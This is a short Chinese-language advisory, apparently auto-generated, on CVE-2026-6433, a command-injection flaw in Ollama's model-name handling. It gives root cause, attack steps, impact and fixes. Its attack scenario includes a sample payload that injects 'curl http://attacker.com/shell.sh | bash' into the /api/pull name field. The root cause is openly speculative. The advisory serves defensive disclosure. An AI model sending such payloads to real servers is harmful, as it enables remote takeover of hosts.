📋 漏洞概述

CVE-2026-6433为Ollama中的高危远程代码执行漏洞，攻击者可利用特制请求在服务端执行任意命令。

📋 基础信息

🔬 漏洞根因

漏洞源于Ollama在处理用户提供的模型名称或路径时，未充分过滤或转义特殊字符（如管道符、分号）。攻击者可通过构造包含shell元字符的字符串，导致底层API在拼接系统命令时（例如调用`ollama pull`或模型加载流程）发生命令注入。推测该缺陷位于模型启停或下载处理的参数解析逻辑中，由于直接拼接用户输入到system()或exec()调用而产生。

🎯 攻击场景

1. 信息收集: 攻击者发现目标Ollama服务（默认监听127.0.0.1:11434）可被外部网络访问或通过SSRF触发。 2. 构造恶意载荷: 利用模型名称参数注入命令，例如发送POST请求到`/api/pull`，将`name`字段设置为`valid-model; curl http://attacker.com/shell.sh | bash`。 3. 触发执行: 服务端解析该名称时，未进行消毒处理，直接拼接至系统命令，导致shell命令被执行。 4. 横向移动: 攻击者通过反弹shell或下载后门，完成对主机的控制。 5. 成功标志: 攻击者获得目标服务器的远程Shell访问权限，能够执行任意系统命令。

💥 漏洞影响

攻击者成功利用此漏洞可导致远程代码执行（RCE），完全控制运行Ollama服务的服务器，进而窃取敏感数据、植入勒索软件、横向渗透内网，严重影响系统机密性、完整性和可用性。

🛡️ 修复建议

立即升级Ollama至0.17.1或更高版本；临时缓解措施包括：配置防火墙规则限制对Ollama API（端口11434）的访问仅允许可信IP，禁用暴露在公网的Ollama服务，并在反向代理层增加输入过滤规则（如禁止包含`;`、`&`、`|`等特殊字符的请求）。

📎 参考链接

• https://nvd.nist.gov/vuln/detail/CVE-2026-6433
• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6433
• 原始来源（Sploitus）

🚨 威胁评估

⚠️ 本文由漏洞情报系统自动生成，仅供安全研究与防御参考。生成时间: 2026-05-17 08:05 | 来源: Sploitus